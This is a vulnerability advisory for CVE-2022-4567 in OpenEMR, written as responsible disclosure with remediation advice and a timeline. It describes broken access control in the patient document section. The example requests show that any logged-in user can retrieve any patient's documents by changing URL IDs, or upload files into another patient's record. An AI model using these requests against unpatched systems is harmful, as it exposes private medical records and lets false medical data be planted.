OpenEMR – Broken Access Controls in Patient’s Document Section (CVE-2022-4567)

14/Dec/2022

Vendor:

URL:

Affected Versions:

Author:

CWE Category:

CVE Identifier:

CVSS Vector:

Severity:

OpenEMR

https://www.open-emr.org/

<= 7.0.0 patch1

Manuel Ginés Rodríguez

CWE-284

CVE-2022–4567

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

8.1 (High)

Summary

An authenticated user with no permissions to access “document” section has the ability to direct access any document in the system by manipulating the patient_id and document_id parameters in the url. The autoincrement identifier was also susceptible of being bruteforced for both parameters, lowering the difficulty of finding valid documents. The second instance allowed unprivileged users to upload files to any user repository.

Impact

Any authenticated user would be able to bypass document access restrictions and download any document related to any user in the system. It was also possible to inject documents to any patient that could leverage malicious data used as valid medical data.

Description

The first instance allows any user to access a document by referencing the patient_id and document_id parameters:

http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19

The second instance affected the upload functionality. The following example illustrates the situation:

POST /openemr/controller.php?document&upload&patient_id=2&parent_id=1& HTTP/1.1

Host: REDACTED

(…snip…)

Upgrade-Insecure-Requests: 1

—————————–247482557730593022112237721191

Content-Disposition: form-data; name=”MAX_FILE_SIZE”

64000000

—————————–247482557730593022112237721191

Content-Disposition: form-data; name=”file[]”; filename=”testBAC.txt”

Content-Type: text/plain

TESTFILE

—————————–247482557730593022112237721191

Content-Disposition: form-data; name=”dicom_folder[]”; filename=””

Content-Type: application/octet-stream

(…snip…)

—————————–247482557730593022112237721191–

The response displayed a “Documents Not Authorized” message, but the file was successfully uploaded:

REQUEST:

GET /openemr/controller.php?document&retrieve&patient_id=2&document_id=23&as_file=false HTTP/1.1

(…snip…)

RESPONSE:

HTTP/1.1 200 OK

Date: Fri, 07 Oct 2022 16:07:36 GMT

Server: Apache/2.4.54 (Debian)

Expires: 0

Cache-Control: must-revalidate, post-check=0, pre-check=0

Pragma: public

Content-Description: File Transfer

Content-Transfer-Encoding: binary

Content-Disposition: inline; filename=”testBAC.txt”

Content-Length: 8

Connection: close

Content-Type: text/plain;charset=utf-8

TESTFILE

Recommendation

Update software to version 7.0.0 (patch 2) or apply the last patch provided.

References

https://www.open-emr.org/release-notes/patch2

https://huntr.dev/bounties/1ac677c4-ec0a-4788-9465-51d9b6bd8fd2/

Timeline



07/10/2022

Report created



08/10/2022

Vendor contacted



19/10/2022

Maintainer Acknowledge



25/10/2022

Validated and Fixed



30/11/2022

Published new release including fixes



14/12/2022

CVE and public release

Do you want to audit your company’s cybersecurity?

Contact a Pentest Specialist